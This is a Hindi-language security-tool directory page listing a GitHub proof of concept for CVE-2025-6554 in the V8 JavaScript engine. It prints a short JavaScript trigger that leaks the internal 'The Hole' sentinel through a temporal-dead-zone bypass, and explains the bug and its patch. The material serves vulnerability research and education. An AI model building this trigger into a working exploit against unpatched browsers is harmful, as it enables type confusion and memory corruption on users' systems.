Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-6554 — V8 जावास्क्रिप्ट इंजन भेद्यता (CVE-2025-6554) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो TDZ बायपास प्रदर्शित करता है जो 'The Hole' सेंटिनल को लीक करता है, जिससे टाइप कन्फ्यूजन और संभावित मेमोरी करप्शन सक्षम होता है। | Kitploit
उपकरण/GitHubGitHub/pwntoday/cve-2025-6554
भेद्यता विश्लेषणशोषणपेपर और शोधलर्निंग और शिक्षाबाइनरी शोषण
GitHubpwntoday/cve-2025-6554

CVE-2025-6554

V8 जावास्क्रिप्ट इंजन भेद्यता (CVE-2025-6554) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो TDZ बायपास प्रदर्शित करता है जो 'The Hole' सेंटिनल को लीक करता है, जिससे टाइप कन्फ्यूजन और संभावित मेमोरी करप्शन सक्षम होता है।

रिपॉजिटरी देखें
231 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-6554

root@kitploit:~
function leak_hole() {
    let x;
    delete x?.[y]?.a;
    return y;
    let y;
}
function pwn() {
    let hole = leak_hole();
    %DebugPrint(hole);
}
pwn();

बग

घोषणा से पहले एक चर y तक पहुंचा गया। सामान्यतः इससे ReferenceError (TDZ) ट्रिगर होना चाहिए, लेकिन पुराने V8 में, जब delete x?.[y] के साथ जोड़ा गया, तो जाँच विफल हो गई और आंतरिक सेंटिनल मान "The Hole" लौटाया।

पैच से पहले

V8 ने केवल एक बार TDZ की जाँच की, फिर गलत तरीके से मान लिया कि y वैध है। इसने "The Hole" को उपयोगकर्ता कोड में बच निकलने दिया।

सुधार

पैच प्रत्येक पहुंच पर एक नई TDZ जाँच (ThrowReferenceErrorIfHole) को लागू करता है, यह सुनिश्चित करता है कि आरंभीकरण से पहले y हमेशा थ्रो करे। प्रभाव: हमलावर "The Hole" को पकड़ सकते हैं और टाइप कन्फ्यूजन, स्टैक ट्रिक्स, या स्कोप बाइपास के लिए इसका दुरुपयोग कर सकते हैं।

टूल डाउनलोड करें